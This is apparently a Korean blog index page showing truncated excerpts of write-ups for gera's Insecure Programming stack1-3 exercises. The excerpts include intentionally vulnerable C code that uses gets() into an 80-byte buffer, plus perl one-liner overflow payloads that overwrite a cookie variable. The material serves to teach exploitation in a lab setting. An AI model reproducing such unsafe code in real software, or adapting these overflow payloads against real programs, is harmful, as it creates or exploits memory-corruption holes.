so_sal　

/* * http://sosal.tistory.com/ * made by so_Sal */ /* stack3.c * * specially crafted to feed your brain by gera */ int main() { int cookie; char buf[80]; printf("buf: %08x cookie: %08x\n", &buf, &cookie); gets(buf); if (cookie == 0x01020005) printf("you win!\n"); } [sosal@localhost gera]$ (perl -e 'print "\x05\x00\x02\x01"x24';cat) | ./stack3 buf: bfc527e0 cookie: bfc52830 you win! gets 함수는 00 (..

/* * http://sosal.tistory.com/ * made by so_Sal */ /* stack2.c * * specially crafted to feed your brain by gera */ int main() { int cookie; char buf[80]; printf("buf: %08x cookie: %08x\n", &buf, &cookie); gets(buf); if (cookie == 0x01020305) printf("you win!\n"); } [sosal@localhost gera]$ (perl -e 'print "\x05\x03\x02\x01"x24';cat) | ./stack2 buf: bfd7d700 cookie: bfd7d750you win! buf[80] 배열을 ov..

/* * http://sosal.tistory.com/ * made by so_Sal */ 취약점이라 하기 뭣한~?! 음, 아주 간단한 문제입니다. /* stack1.c * * specially crafted to feed your brain by gera */ int main() { int cookie; char buf[80]; printf("buf: %08x cookie: %08x\n", &buf, &cookie); gets(buf); if (cookie == 0x41424344) printf("you win!\n"); } buf[80] 배열을 overflow 시켜서, cookie 변수의 value를 \x41424344로 바꿔주면 되겠습니다. [sosal@localhost gera]$ (perl -e..

/* * http://sosal.tistory.com/ * made by so_Sal */ http://community.corest.com/~gera/InsecureProgramming/ 사이트를 소개하겠습니다. 보안에 취약한 프로그램 코드를 소개하고, 그 취약한점을 확인(?) 하면서.. 시스템해킹을 연습하는 아주 재밌는 사이트입니다. ㅎㅎ Here you can find a collection of exercises that will help you teach yourself the art of insecure programs exploitation. It's not complete, but it's minted to open your mind. The idea is NOT to use any hum..